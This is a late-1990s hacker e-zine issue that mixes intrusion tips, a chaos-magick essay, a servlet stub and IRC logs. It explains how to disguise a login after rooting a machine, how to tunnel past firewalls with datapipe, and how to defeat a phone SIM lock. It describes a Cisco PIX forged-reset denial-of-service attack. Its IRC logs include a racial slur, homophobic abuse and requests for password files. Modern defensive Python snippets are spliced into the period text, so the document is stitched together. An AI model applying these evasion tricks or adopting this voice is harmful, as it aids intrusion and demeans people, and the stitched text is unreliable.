        static void main(String[] args) {
      
      And it will work in anything except M$-made stuff. ;-)
      
      ------****------
      
      Byteware from Jus...
      
      How to impress your lame linux buddies? If you haven't figured this one out
      yet, congratulations - I'm speechless. 'nix uses a file called /etc/hosts to
      identify known hosts for domain resolution, to prevent a full DNS lookup
      every time that host or IP is used, or if a DNS lookup isn't suitable for that
      IP. Usually this will contain something like localhost resolving to 127.0.0.1
      and your machine's (static) IP and its hostname (obviously only if the machine
      has one). /etc/hosts overrides DNS lookups, so you can play cute games with it
      on your machine. For example, change 127.0.0.1's resolution from "localhost"
      to "whitehouse.gov". Telnet 127.0.0.1, login and voila - do a "who" and see
      yourself logged in from the whitehouse :P
      
      This can actually be very useful to hide your connections as many people will
      take what a "who" says at face value and not look any further into it - root a
      box, change your current IP's resolution in that machines /etc/hosts to your
      enemy next door, and telnet in and you appear to be connected from
      idiot.hostname.com's machine... now there's a thought... Obviously you can't
      use this very seriously - if you're smart enough to get that far you will
      realise that a netstat -na will show otherwise :P
      
      ------
      
      Got any annoying network firewall you wanna sneak around? Well, if you aren't
      a prize circus clown then you may have already discovered the beauty of some
      simple code known as datapipe (src on www.security.za.net). Your usual network
      firewall will have basic things open like http (80) and ftp (21) allowed out,
      but not your favorites like telnet (23), ssh (22) or irc (6667) - tsk, shame.
      Datapipe lets you setup a pipe for data coming in on one port to another port
      on another host - sounds interesting. You could run datapipe on a machine
      outside of your network to listen on port 80 or 21, and then pipe the
      connection to your irc server on port 6667, or even to the local machine's
      telnet or ssh port... gee, that was tough. You could then /server
      externalmachine.com 21 or telnet externalmachine.com 80, and the network
      firewall will allow the outgoing data stream, but the external datapipe will
      change the flow of data to where you really want it to go -
      deranged.blabber.net (6667) for example :) [Wyzewun: Yeh, BlabberNet is neat,
      pity about the gay IRCOps there though (Jus, Vortexia, TimeWiz) :P] You will
      get datapipe, use it and like it. Duh.
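
      A port-only firewall rule cannot see this, but the first bytes of the
      session give it away. The detector below is an added example, not part of
      the original article or of datapipe: it checks whether traffic to the
      allowed ports 80 and 21 actually starts like HTTP or FTP. The flow records,
      addresses and signature list are constructed for illustration.

```python
import re

# Protocol each allowed outbound port is supposed to carry (ports from the article).
EXPECTED = {80: "http", 21: "ftp"}

# First-payload signatures. FTP servers and SSH peers open with a banner,
# HTTP and IRC clients speak first, telnet opens with IAC option negotiation.
SIGNATURES = [
    ("http", re.compile(rb"^[A-Z]+ \S+ HTTP/\d\.\d\r?\n")),
    ("ftp", re.compile(rb"^220[ -]")),
    ("ssh", re.compile(rb"^SSH-\d+\.\d+-")),
    ("irc", re.compile(rb"^(?:NICK \S+|CAP LS|USER \S+ \S+ \S+ :)")),
    ("telnet", re.compile(rb"^\xff[\xfb-\xfe]")),
]

# Constructed flow records: (inside host, outside host, dst port, first payload).
SAMPLE_FLOWS = [
    ("10.1.1.20", "203.0.113.9", 80, b"GET /index.html HTTP/1.0\r\n\r\n"),
    ("10.1.1.20", "203.0.113.9", 21, b"220 FTP server ready\r\n"),
    ("10.1.1.31", "198.51.100.4", 21, b"NICK someone\r\nUSER someone 0 * :x\r\n"),
    ("10.1.1.31", "198.51.100.4", 80, b"SSH-1.99-example\r\n"),
    ("10.1.1.44", "198.51.100.4", 80, b"\xff\xfd\x18\xff\xfd\x20"),
    ("10.1.1.44", "192.0.2.77", 6667, b"NICK someone\r\n"),
]


def classify(payload):
    """Name the protocol the first payload looks like, or 'unknown'."""
    for name, pattern in SIGNATURES:
        if pattern.match(payload):
            return name
    return "unknown"


def find_mismatches(flows):
    """Return (src, dst, port, expected, seen) where the port carries the wrong protocol."""
    findings = []
    for src, dst, port, payload in flows:
        expected = EXPECTED.get(port)
        if expected is None:
            continue  # port is not covered by this policy
        seen = classify(payload)
        if seen != expected:
            findings.append((src, dst, port, expected, seen))
    return findings


def relay_candidates(findings):
    """Group outside hosts with the ports on which the wrong protocol showed up."""
    hosts = {}
    for _src, dst, port, _expected, _seen in findings:
        hosts.setdefault(dst, set()).add(port)
    return {dst: sorted(ports) for dst, ports in hosts.items()}


if __name__ == "__main__":
    hits = find_mismatches(SAMPLE_FLOWS)
    for hit in hits:
        print(hit)
    print(relay_candidates(hits))
```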
      
      ------****------
      
      Byteware from DvD...
      
      In RedHat 6.0, users with uid 1000 or higher can execute 'shutdown -r now',
      which will cause the system to reboot and go into single-user mode. Oops.
      
      ;,                                                                       ,;;4,
      ,?;;$;,__________________________________________________________________,,7$;
      
      
           __... .                                                   . ...__
        d$$^^                                                             ^^$$b
      .?$;                                                                   ;$$;:;,
      _.          Cellphone Unlocking without the Mastercode by Moe1    ._ ,;:;,, _.
      
      This works on Nokia 21xx/31xx/51xx/81xx. 
      This doesn't work on software version (5.04).
       
      First of all your PIN code must be on, then press C, arrow down, C, and hold 
      until it clears display then press * and hold until it starts to blink then
      press * again and hold until it starts to blink then type 
      04*YOURPIN*YOURPIN*YOURPIN#.
      
      It should then say "PIN code changed" or something and the SIM card is now
      accepted. Note: Each time you turn your phone OFF it resets the lock, so
      this needs to be done each time you turn your phone ON.
      
      ;,                                                                       ,;;4,
      ,?;;$;,__________________________________________________________________,,7$;
      
      
           __... .                                                   . ...__
        d$$^^                                                             ^^$$b
      .?$;                                                                   ;$$;:;,
      _.    Hacking Reality: An Introduction to Khaos Magick by Wyzewun ._ ,;:;,, _.
      
      As a practicing Chaote, I was very interested to have recently seen two
      articles regarding occult issues in what would strictly be called H/P e-zines.
      The two e-zines I am referring to are b4b0 issue 9 and b0g issue 2, and the
      two schools covered being Khaos Magick and Satanism respectively. Both zines
      are available @ PSS should you be interested in checking them out some time.
      (http://packetstorm.securify.com/mag)
      
      So why did I see a need for another article on the subject? Well, Synner's
      article in b4b0, despite being quite good, left out a few very important
      points as to what Khaos Magick is all about. I will also try and throw as many
      of my personal opinions about Khaos Magick into this as possible, to make it
      interesting to people already familiar with the system. And ultimately, it's
      hard to summarize such a complex system in a single article - so read both
      anyway. ;-)
      
      As for reading the article in b0g on Satanism... well... I have to be honest -
      I found the entire original content insipid and stupid but the passages quoted
      directly out of Anton LaVey's Satanic Bible make it worth reading anyway,
      despite the typos. Especially considering that LaVey was influenced by
      Aleister Crowley and HP Lovecraft as were many of the early Khaos Magicians
      like Austin Osman Spare. And more importantly, regardless of that article,
      b0g has to be one of the funniest zines the H/P community have produced ever.
      
      Right. Now Let's get started... The alt.magick.chaos FAQ contains a menagerie
      of definitions of Khaos Magick, and I suggest you read them all should you
      be interested. But the one I am going to give you in this article comes from
      Joseph Max.555, who I think defines it quite well...
      
         Chaos Magick is currently the cutting edge of modern Ceremonial
         Magick. It largely grew out of the work of Austin Osman Spare, though
         it has been fractalized into many forms over the last 10 or so years.
         
         Chaos Magick emphasizes a personal, experimental approach to magickal
         practice, de-emphasizes "traditional" approaches (ie. GD, OTO, et al)
         especially as regards "secret knowledge", male/female dichotomies and
         order hierarchy; what can be learned from Masters or Gurus is far less
         important or effective than what a dedicated researcher can discover
         for hirself. As such, shamanism is incorporated more directly than
         such historical approaches as Kaballa, though most Chaotes are quite
         adept at examining traditional systems, incorporating what works and
         discarding that which holds no personal appeal.
         
         Chaos Magicians look at Magick as being a _living_ art rather than an
         _antique_ one. They regard the various belief structures of magick as
         being the _means_ rather than the _end_, and the most adept can alter
         their belief-state as easily as they change clothes. Chaos Magick
         recognizes no particular system of theology as having any more
         "reality" than any other, and most Chaotes (like Jung) approach
         deities as being no more than archetypical constructs of the
         subconscious mind. Therefore they are far less concerned with having
         any (in their eyes) arbitrary moral system pounded into their skulls
         before getting to actually put magickal techniques into practical use
         than "Old Aeon" systems like the GD's or Abra-Melin.
         
         Chaos Magick propounds no particular dogma or moral system, beyond
         its most common identifier: "Nothing is True, and Everything is
         Permitted."
         
         I have yet to meet, however, any adept Chaos Magician who doesn't have
         a strong sense of personal ethics and subscribe to it fervently.
      
      And in this one sees many of the points which Synner neglected to mention.
      But before even beginning to touch on those, I'm going to hop way back and
      give my personal definition of Magick in general for the benefit of those
      unfamiliar with such a concept beyond fairy-tale literature...
                                        
      Magick is the art of bending reality to one's will for whatever reason be it
      personal or so-called "god sent". Magick *has* to exist simply because so many
      people in so many different places practice it. And even should Magick *not*
      exist, *because* so many people practice it, it *does*. Why? Because Magick
      exists. Confused? Good. I have succeeded in wasting your time. Now let's move
      on... ;-)
      
      Now let's begin to look at approaches to Magick. Up to the point where Khaos
      Magick stepped into the world, Magick was approached largely from a
      traditional viewpoint. This means that Magick has been performed in manners
      passed down over generations, the original method of which was probably
      obtained from some-one who had ingested something hallucinogenic, was mildly
      insane, or perhaps actually had a very strong affinity with the supernatural.
      Of course, to a Chaos Magician (referred to from here on as Chaotes), which
      one of these it was doesn't really matter in terms of effectiveness. :)
      
      You see, most chaotes adopt Jung's concept of gods as archetypes of the
      subconscious mind. Thus the emphasis is not placed on *HOW* Magick should be
      performed, but on actually *MAKING* it happen. The Chaote acknowledges that
      an invocation to Homer Simpson can be just as effective and in some cases
      perhaps even more effective than one to a traditional deity. Also, which
      represents drunkenness better to you - Dionysus (ancient Greek god of wine) or
      Barney from the Simpsons? I thought so. Now maybe you're whining that Barney
      isn't a "god", but to some extent, he IS, in that by you *thinking* of him as
      a god, he becomes so. Nothing needs to "exist" - it works anyway - which is
      why Chaos Magick is the only school to have Atheist magicians. :)
      
      In Conclusion, I would like to recommend that anyone interested in learning
      more about Magick and particularly Khaos Magick, should read the work of
      the following people who have written stuff in these fields...
      
      Psychology: Jung, Freud, Nietzsche
      
      Occult: Peter Carroll, Austin Osman Spare, Anton LaVey, Aleister Crowley,
              Tzimon Yliaster, Phil Hine
      
      Fiction: Isaac Asimov (Esp. "The Last Question"), HP Lovecraft, JRR Tolkien
      
      Art and Theatre Movements: Surrealism, Constructivism, Dadaism, Absurdism,
                                 Existentialism, Expressionism
      
      And also check out the following URL'z...
      
      www.chaosmatrix.com
      www.crl.com/~tzimon
      www.occultsearch.com
      www.chaosmagic.com
      www.execpc.com/~discord/iot
      ds.dial.pipex.com/specularium
      
      Later this year, Pneuma and I will publish "Liber Tine" online, the book on
      our approach to Khaos Magick which we are writing. Until then, Cheers...
      
      ;,                                                                       ,;;4,
      ,?;;$;,__________________________________________________________________,,7$;
      
      
           __... .                                                   . ...__
        d$$^^                                                             ^^$$b
      .?$;                                                                   ;$$;:;,
      _.              K-r4d 0h-Day Chr1stian1tY War3z fr0m Var10uz      ._ ,;:;,, _.
      
      We received divine inspiration from the following visitor to #5fm, who has
      bestowed upon us great wisdom which we shall cherish our entire life...
      
      --- BEGIN LOG ---
      
      * lee (lee@ABD7AD12.ipt.aol.com) has joined #5fm
      <Pneuma> <efG>
      <opium> pn3um4, i h4ck3d n4s4
      <lee> hello any christians out there???
      <lee> helllloooooooo
      <Pneuma> lee: I just ate them all, maybe tommorow :P
      <Lupine> lol
      <BiNg_> keep religion out of this channel
      <opium> h m hw  hk
      <nemesis> BiNg_: YEAH!!
      <ALLOK> huh?
      <Pneuma> lee: I told you already, I Ate them all, try tommorow!
      <lee> no, GOD is everywhere!!!!!!!!!!!!!!!!!!
      <opium> pneuma, t34ch m3 h0w t0 h4ck!!
      <BiNg_> ?
      <Pneuma> Ok, enuff about religion b4 I make u cry
      <lee> what is wrong with you, why cry???
      <nemesis> lee : go away to #god or something
      <opium> i worship Pneuma
      <opium> he is my gof
      <opium> he is my god
      <lee> never heard of him
      <Pneuma> Opium: thats understandable
      <ALLOK> i worship money
      <lee> shaim
      <lee> money.................
      * Pneuma is the god of good sex, beer, and evil computer trix
      <nemesis> lee : ja ... so leave.
      <BiNg_> i dont bow down before anyone
      <lee> well, some day, when GOD comes, EVERYBODY will bow
      <ALLOK> to me
      <BiNg_> can you prove that
      <lee> bible
      <BiNg_> oh yeah
      <nemesis> lee : GET THE HINT? # god
      <Pneuma> JESUS MOWS MY LAWN!!!!!!!!!!!!!
      <lee> be carefull what you say!!!!!!!!!!!!!!!!!!!!!!!
      <nemesis> lee : or what?
      <lee> well, tonight i will pray for you and someday your'e eyes will open
      <ALLOK> aaaaaaaaaaaaaaaaaaaaaaaahhhhhhhhhhhhhhhhhhhhhhhhhaaaaaaaaaaaaaaaaaaahh
              MY EEEEEEEEYYYYYEEEEEEEEEESS
      <ALLOK> I'M BLIND
      <nemesis> Lee : yeah whatever...the aliens built us, or sum such shit
      <BiNg_> why should i trust someone who took away to of my closest friends and then
              when i ask someone they say "god works in mysterious ways"
      <nemesis> BiNg_: yeah...explain that..
      <lee> well, stop being stupid, you know the truth but you are to proud to
            admit it, why can't you just chat, that is all i want
      <ALLOK> BOOM, (it's the voice of G.O.D)
      <opium> lee: *lick*
      <nemesis> Lee : isnt it prayer time or sumthing?
      <lee> are all of you from sa
      <Pneuma> Yes, and proud of it, Better than being a dumb hippie american :P
      <opium> YAAAAAAAAAAAAAAAAAAAWN
      <nemesis> lee: WHO CARES? { sumbody plz kick him!!}
      <ALLOK> i care
      <lee> also safrican
      <lee> who says it's a him
      <BiNg_> religion is the world's best practical joke
      <opium> lee, are u gay?
      <Pneuma> HEH!
      <lee> no, i am straight and i am a girl
      <opium> oh
      <lee> opium, wanna chat.
      <opium> nah
      
      --- END LOG ---
      
      So, inspired by the light of Jesus, we decided to 'grep -i' all our IRC logs
      for 'jesus' and 'christ' - the results of which looked something to the effect
      of this...
      
      In #b4b0 ...
      
      <samj> cause like christians are against alternate life styles
      * Topic is 'Let's party like we were at a christian suicide.'
      <opcode> jesus christ.
      <majere> jesus h fucking christ
      <jcb> jesus christ
      <JimJones> JESUS CHRIST
      <gl4z> jesus chr1st. 
      <chrak> jesus be in heaven
      <gore> I'm so sick of jesus
      <lusta> jesus
      <tymat> jesus
      <elneenja> jesus du0d
      <tip> jesus.
      <JimJones> jesus thats a stupid ploy.
      
      In #ch4x ...
      
      <peapeJ> at a fucking club for christ's sake
      <di9ital> jesus
      <di9ital> jesus fuck
      
      In Blabber.Net's #hack ...
      
      <Aragon> christ
      <xanex> Blu_J: CHRIST
      <cinos> christ
      <cinos> christ almighty
      <cinos> hey christ man
      <cinos> christ
      <cinos> christ all fucking mighty
      <Jaguar> christ..
      <fern> i mean CHRIST!
      <taliesin> hmmm... all i want for christmas is my little cray, my little cray
      <fern> GEZUZ FUCKING CHRIST SUPERSTAR
      <fern> my oath to christ
      <cache> christ i wonder how fuqn ugly she was to go for someone lookin like u
      <fREkaZ0iD> HOLY CHRIST Sega Dreamcast has 24mb ram!!!!!!
      <vision> for christ sake
      <vision> christ vort ;P teach some people here how tcp/ip works
      <vision> jus :P christ i use fbsd.
      <vision> christ everyone shutup
      <vision> christ i wonder whats going on.
      <vision> christ (: i know ipv4 better than the people who designed it.
      <vision> christ i am smurfing myself now.
      <fREkaZ0iD> dood you are as pissed as a coloured on christmas eve
      <Umaro> jesus christ
      <wyze1> ack! christians!
      <jus> christ :P
      * opium was kicked by hotmetal (YOU DO NOT RUN NAMED FOR CHRISTS SAKE)
      <Aragon> christ
      <DrSmoke> jesus christ netscape is a piece of shit.
      <DrSmoke> jesus christ wget
      <MAgikm> christ
      <dem0n> christ
      <dem0n> christ what a lame topic
      * Topic is 'Vortexia looks like Jesus'
      <X-sTrEaM> UglyKidJoe: jesus bru at least upgrade to OSR2.
      <X-sTrEaM> jesus
      <X-sTrEaM> c/s: 48867? jesus!@#
      <fREAkaZ0iD> jesus my modem cant do that
      <xanex> Vortexia: hey wanker jesus wannabe
      <fREkaZ0iD> jesus
      <fREkaZ0iD> holy jesus
      <fREkaZ0iD> jesus
      <Aragon> jesus, 40 sectors bad
      <fREkaZ0iD> jesus
      <fREkaZ0iD> jesus
      <Umaro> jesus christ
      <fREkaZ0iD> JESUS CHRUST
      <Pneuma> jesus d00ds, so god damn what if we like the bible!!!
      <Estaga> jesusfuck
      <DrSmok[e]> jesus I'm still rushing
      
      In #HWA.hax0r.news ...
      
      <_655321_> fucking christ man
      <wyze1> Told you all Christians were insane :P
      <Who74> oh christ
      <Who74> christ
      <Who74> christ, it wasnt that good
      <Cruciphux> christ
      <SugarKing> oh jesus
      
      In #Legions ...
      
      <BloodAxe^> !fuck Christina Aguilera
      <Cyrano423> ahh k, I should start some Christianity questions (hopefully that
      statement did not offend anyone)
      <Mnemonic> Zao == Christian hardcore
      <lothos> christianity scares me
      <Mnemonic> it's Christian hardcore
      * techn1cs has quit IRC (he dreamed a god up and called it christianity)
      <DataShark> christ redhat labs droped 3 1/4.
      <KrankShft> christ almighty.
      <ritual> christian rock sucks
      <Dixie> i dont care if you were jesus fucking christ.
      <Mnemonic> but don't use Christ's name in vain
      <ritual> christian music blows
      <cyrez> christian, muslim, buddah, jehova.... all the same
      <nofx> christ
      * Becky- has quit IRC (Jesus may love you, but everyone else thinks you're an
        asshole.)
      <jorge> jesus, people upstairz fuqn sound like they r fuqn killing people by
       hitting them with baseball bats
      <Je5u5> #Jesus unable to rejoin channel (you're banned!)
      <Je5u5> they do not LIKE JESUS
      <Je5u5> I am in JESUS CHAN 
      * shekk is now known as fukJesuS
      * fukJesuS is now known as jesusblow
      <slackette> hehe Nt im opped in #jesus
      <Cyrano423> why is it they do not talk about Jesus in #jesus
      <wyze1> I bet you I could make them talk about Jesus ;P
      <wyze1> <wyze1> y0 man, i had dis mad dream dat i had anal sex0r with jesus,
       what do u think it meanz?
      <wyze1> <wyze1> i never knew jesus was a nigger
      <Kane14> jesus
      <Kane14> jesus
      <ironik> jesus
      <methix> oh jesus
      
      In the (now deceased) #zahack on EFNet ...
      
      <vision> christ i am pissed off.
      <vision> christ.
      <cyberphrk> and how when it was my turn, santa (satan if you concentrate real
       hard) asked me what i wanted for christmas, and i replied with a big
       stupid-ass smile, 'A BEAVER!'
      <xmagii> jesus christ, have u no shame
      <vortexia> geeezus christ
      <vortexia> geeezus christ if this is the way my friends repay me for what I do
      <vision> for christ sake what did i miss now.
      <Vortexia> PhreakAZD yes, I believe in God, I am a Christian, though I do not
       follow organized religion, my Christianity is derived from how I perceieve
       the bible, not how others do
      <xmagii> jesus don't start that ? crap again
      <xmagii> jesus the chances of the sequencing being right must be one in a
       million
      <xmagii> jesus
      <fREAKaZiD> jesus
      <fREAKaZiD> JESUS!
      <fREkaZ0iD> jesus
      <fREkaZ0iD> JEsus chrsist i hate this town
      <fREkaZ0iD> jesus u got a bigg rectum
      <fREAKaZiD> jesus
      <fREkaZ0iD> jesus
      <fREkaZ0iD> jesus man
      <fREkaZ0iD> hahahahahaha jesus what a wanker
      <fREkaZ0iD> jesus ignore this guy
      <fREkaZ0iD> jesus
      <fREkaZ0iD> jesus
      <fREkaZ0iD> jesus
      <fREkaZ0iD> jesus
      <fREkaZ0iD> jesus
      <fREkaZ0iD> jesus man
      <cyberphrk> vortexia, opium told me you look like jesus, now im thinking all
       weird of you
      <cyberphrk> vortexia, yeah, he's right, you're jesus
      
      And THAT, ladies and gentlemen, was the international hacking scene's
      contribution to the institution of Christianity. We hope you enjoyed it, and
      if you didn't - We don't care. Just leave us alone for Christ's sake. ;-P
      
      ;,                                                                       ,;;4,
      ,?;;$;,__________________________________________________________________,,7$;
      
      
           __... .                                                   . ...__
        d$$^^                                                             ^^$$b
      .?$;                                                                   ;$$;:;,
      _.                Cisco PIX Denial of Service by Vortexia         ._ ,;:;,, _.
      
      Hi All, just a bit of a security notification.
      
      Cisco has been informed of this problem and I'm waiting for a fix for the
      problem. I've also noted that various other firewalls are affected by this
      code, though if you wanna know if whatever you are running is affected,
      you will have to test it.
      
      A brief rundown of the problem.
      
      If you run routable ips on your internal interface on your pix, and
      routable ips on your external interface, so the pix is not running nat,
      the pix keeps a state table of everything going on.  Anything that is not
      in your state table that attempts to come in from the outside is denied,
      even if there is a conduit in place to permit anything.  Which means that
      you have to establish a connection from your internal network to your
      external network before anything external can send data back.  This is a
      really nice feature, unfortunately there is a bit of a bug that I found in
      this.  While testing on in house equipment for possible flaws, as we
      continually test various products, I found the following.
      
      On receiving a RST packet (TCP Reset) from a given host with the correct
      source and destination port, the PIX will drop the state entry for that
      particular connection, which means the tcp connection dies due to the fact
      that with no state entry the external box can no longer talk to the
      internal box.
      
      So, if we take a standard raw ip packet, give it a tcp header, and set the
      source ip as a machine that your internal box is connected to, and the
      destination ip as your internal machine, set the source port on the
      spoofed ip as the port the person is connected to, set your destination
      port on your destination ip cyclically to possible source ports on his
      side, and send resets, it will drop the persons state table entry, cutting
      him off from the box he is connected to.
      
      Now, the one question I asked when I wrote this, is why does this work,
      why is there no seq/ack checking on RST packets, this was answered in the
      TCP RFC, saying that seq/ack numbers are not checked on RST packets,
      however they are checked on FIN packets, hence using FIN packets for this
      test is futile without sequence prediction code.
      
      There is a simple work around for this problem however, and anyone wishing
      to know the details of that is free to email me at andrew@cnsec.co.za for
      details.
      
      Below I have posted example code to show the exploit and how it works, and
      hopefully this will be useful to someone on this list and help fix a
      fairly nasty denial of service problem.
      
      Many Thanks
      
      Andrew Alston
      Citec Network Securities (Director)
      Phone: (011) 787 4241
      Fax: (011) 787 4259
      Email: andrew@cnsec.co.za
      
      [Ed: Exploit code can be found in ./kodez/CiscoPIX]
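
      A toy model of the state-table behaviour described above, next to a variant
      that only honours a RST whose sequence number falls inside the tracked
      receive window. This is an added example: it is not Cisco's code, not the
      exploit from ./kodez and not the workaround the author mentions. The class,
      addresses, ports and sequence numbers are constructed, and the window check
      is an assumed mitigation chosen for illustration.

```python
from dataclasses import dataclass

SEQ_MOD = 1 << 32  # TCP sequence numbers are 32-bit and wrap around


@dataclass
class Conn:
    rcv_nxt: int  # next sequence number expected from the outside peer
    rcv_wnd: int  # receive window currently offered to that peer


def in_window(seq, rcv_nxt, rcv_wnd):
    """True if seq lies in [rcv_nxt, rcv_nxt + rcv_wnd), with 32-bit wrap-around."""
    return (seq - rcv_nxt) % SEQ_MOD < rcv_wnd


class StateTable:
    """Toy table keyed by (outside_ip, outside_port, inside_ip, inside_port)."""

    def __init__(self, check_rst_seq):
        self.check_rst_seq = check_rst_seq
        self.entries = {}

    def track(self, key, rcv_nxt, rcv_wnd):
        self.entries[key] = Conn(rcv_nxt % SEQ_MOD, rcv_wnd)

    def on_rst(self, key, seq):
        """Handle an inbound RST; return True if the state entry was removed."""
        conn = self.entries.get(key)
        if conn is None:
            return False  # no such connection, nothing to tear down
        if self.check_rst_seq and not in_window(seq, conn.rcv_nxt, conn.rcv_wnd):
            return False  # addresses and ports match, sequence number does not
        del self.entries[key]
        return True


# Constructed values: one tracked session from an inside client to an outside server.
KEY = ("203.0.113.9", 23, "192.0.2.50", 1042)
RCV_NXT, RCV_WND = 0x7A3F0010, 8192


def entry_survives_forged_rsts(table):
    """Feed RSTs that match addresses and server port but carry an arbitrary
    sequence number, one per candidate client port; report whether the entry is left."""
    table.track(KEY, RCV_NXT, RCV_WND)
    outside_ip, outside_port, inside_ip, _ = KEY
    for inside_port in range(1024, 1100):
        table.on_rst((outside_ip, outside_port, inside_ip, inside_port), seq=0)
    return KEY in table.entries


if __name__ == "__main__":
    print("4-tuple match only :", entry_survives_forged_rsts(StateTable(False)))
    print("with window check  :", entry_survives_forged_rsts(StateTable(True)))
    # With an 8192-byte window a blind guess still lands in the window about
    # once in 524,288 tries (2**32 / 8192), so the check raises cost, not to zero.
```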
      
      ;,                                                                       ,;;4,
      ,?;;$;,__________________________________________________________________,,7$;
      
      
           __... .                                                   . ...__
        d$$^^                                                             ^^$$b
      .?$;                                                                   ;$$;:;,
      _.              An Introduction to Java Servlets by Wyzewun       ._ ,;:;,, _.
      
      Java Servlets are an extremely powerful server side CGI-replacement supported
      by most major web-servers, and used by very few admins - most notably because
      they either don't know they exist or don't have the skill needed to write
      them. Java Servlets have several advantages over Perl and other traditional
      CGI languages in that they are faster to write and to run, infinitely more secure,
      and have all the advantages of the extremely well furnished Java Servlet API.
      
      In this tutorial I will teach you how to write simple Java servlets. Although
      a knowledge of the Java language is not *completely* necessary to understand
      this, it will certainly help. What you *will* need is a basic knowledge of the
      HTTP protocol, of HTML, and of any object-orientated programming language.
      With that said - let's get going...
      
      Servlets are written like normal programs, except that they extend the
      superclass HttpServlet. We just override the functions doGet(), doPut(),
      doTrace(), doPost() and doDelete() - the HTTP request each one handles is
      kinda obvious. =) Right, let's code a simple servlet quick...
      
      import java.io.*;             // IOException and PrintWriter live here
      import javax.servlet.*;       // Import the libraries we need to make HTTP
      import javax.servlet.http.*;  // servlets and throw the right exceptions
      
      // Here we declare the class and make it extend the HttpServlet Superclass.
      // It is public so the servlet container can load and instantiate it.
      public class SimpleExample extends HttpServlet {
      
      /* This over-rides doGet() and passes it the user's request (called "req" in
         this example) and the Servlet's response (called "res" here). Both
         exceptions thrown are required by the HttpServlet superclass. doGet() is
         protected in HttpServlet, so the override may not be less visible. */
       public void doGet(HttpServletRequest req, HttpServletResponse res)
         throws ServletException, IOException {
      
         // Set HTTP Content Type
         res.setContentType("text/html");
         // Get communicating with the luser
         PrintWriter out = res.getWriter();
         // Send HTML
         out.println("<html><head><title>Servlet Output</title></head><body>"
         + "<h1>FUQ J0O!@#$</h1></body></html>");
         // Close Stream
         out.close();
      
      } // end of doGet();
      } // end of SimpleExample
      
      OK, this issue is being released tomorrow, and a chiq friend of mine bought me
      a bottle of champagne and a condom for my birthday, so I gotta be honest - I
      don't have time to finish this article. :) Will make a sequel in future issues
      if I think anybody cares enough. Cheers...
      
      ;,                                                                       ,;;4,
      ,?;;$;,__________________________________________________________________,,7$;
      
      
           __... .                                                   . ...__
        d$$^^                                                             ^^$$b
      .?$;                                                                   ;$$;:;,
      _.                Fixing M-Web Specific Modems by JungleG         ._ ,;:;,, _.
      
      <DISCLAIMER>
      I don't know anything about what I'm about to tell you - I haven't tried it
      myself.  I don't own any Mweb modems, nor do I condone doing this. If you
      ever try to turn this against me, in any way, I cannot be held responsible
      and you must pay me 100 million Rand.
      </DISCLAIMER>
      
      So, you're sitting there one day and this advert comes on the TV telling you
      that you can buy a Mweb Net-Getter (sp?) modem for R99.  Great you think,
      this is awesome, I can get myself a 56K modem for only R99, right?
      
      Wrong.
      
      The Mweb Net-Getter modems are Mweb specific, ie. they only work when you
      dial into an Mweb POP. Until now.
      
      Here's what you do:
      
      1) Find yourself an EPROM writer.  Most universities and some security companies
      have them too.
      2) Go to your favourite electronics supplier and buy a 27c2000 EPROM Chip.
      3) Find a friend / uncle / relative / boss / etc who has a Fastlink V.90
      modem.
      4) Open the Fastlink up, remove the EPROM and copy the EPROM from the
      Fastlink onto your newly bought 27c2000 EPROM.
      5) Close the Fastlink modem up and return it.
      5) Open the Mweb modem up and replace the existing EPROM with the newly
      bought and programmed 27c2000 EPROM.
      6) Close the Mweb modem.
      7) Plug and Pray.
      8) There is no 8 .. I thought 8 looked good though.
      
      Easy as that, you now have a 56K V90 modem for R99.
      
      Jungle G
      
      ;,                                                                       ,;;4,
      ,?;;$;,__________________________________________________________________,,7$;
      
      
           __... .                                                   . ...__
        d$$^^                                                             ^^$$b
      .?$;                                                                   ;$$;:;,
      _.                       Miscellaneous IRC Gayness                ._ ,;:;,, _.
      
      <d\r\e\> heh
      <d\r\e\> you a girl?
      <Pneuma> nah, not right now, why?
      <d\r\e\> uh
      <d\r\e\> somehow that answer strikes me as awkward.
      
      <paszaz> hi there
      <Pneuma> lo
      <paszaz> do u know Back Orifice?
      <Pneuma> never met him
      <paszaz> It's not a him, it's a program
      <Pneuma> oh
      <paszaz> ok
      
      <Eth`real> what is a .tar file?
      [Ed: She's a #hack netslut - but I s'pose you figured that out already :P]
      
      [Ed: More #hack netsluttery...]
      <Andi> vans kissing my tits. r u jealous?
      <Aragon> lol
      <Aragon> no
      
      <Kat> ive hax0red everyb0dy and now im dealing in pr0n instead
      
       acid is back!!!!!!!!
      <acid> with PIZZA!!!!!!!!!!!!!!!!!!!!
      <acid> _(@^#^#_!@!@#
      <Aragon> yay
      <xanex> pizza
      <xanex> pizza
      <xanex> pizza
      <xanex> pizza
      <acid> woo hoo
      <Kat> omg im gonna order pizza
       jus awaits his pizza
      [Ed: Cretins :P]
      
      <OpTiC> if u get someone elses dial up account do u pay telkom?
      
       GreekGod is pretty good, thnx
      <Pneuma> oh, good
      <Pneuma> do u spit or swallow?
      <GreekGod> excuse me?
      <Pneuma> oh, sorry, wrong window
      <GreekGod> damn right!
      <GreekGod> lol
      <Pneuma> no, only if its really soft
      <Pneuma> wtf! wrong window again! it keeps popping up
      <GreekGod> uhm, just a matter of interest
      <GreekGod> What are you talking about?
      <Pneuma> no, thats too ruff! slower
      <Pneuma> dammit, why does this keep coming?
      <GreekGod> fuck, you are a sick person
      <Pneuma> why the hell does this come in the middle of my conversations?
      
      <NightFall> Ugly ... im 17 , hacker dude in training so to speak
      <UglyKidJoe> hacker in training ?
      <UglyKidJoe> this sounds so lame
      <NightFall> got my good fair share for being spooked the other day
      <NightFall> pinged www.fbi.gov
      <UglyKidJoe> wow
      <UglyKidJoe> u are so l33t
      <UglyKidJoe> i got to log this
      <NightFall> port tampering email was send to my isp
      <NightFall> geez
      <NightFall> I didnt even connect
      <NightFall> dumb assies
      <NightFall> got a warning
      <NightFall> dumb shit
      <NightFall> :P
      <NightFall> some crap about the american embasy being in pretoria and me not
       being imune to fbi
      <NightFall> yak yak yak
      <NightFall> :P
      
      <Harper> hehe
      <Harper> harper the unopped ;)
      <zigy> hehe
      *** Harper was kicked by Pneuma (Opped)
      
      [Ed: #Darknet elitez...]
      <Pneuma> wtf is gay-boi, he has my STDs!!!
      <Snacker> rave- : yo there ?
      <rave-> shur
      <Snacker> rave- : can u give me some hints to break in a Apache/1.3.3 (Unix)
                Debian/GNU on Linux  ?
      
      [Ed: Have I mentioned how cool #Darknet is, btw?]
      <DA^BOMB> sup rave
      <DA^BOMB> send a brotha some more passwd fles
      
      [Ed: And while we're at it, have ya seen NXT-Howto.txt by E-Mind of #Darknet?]
      
      <snip>
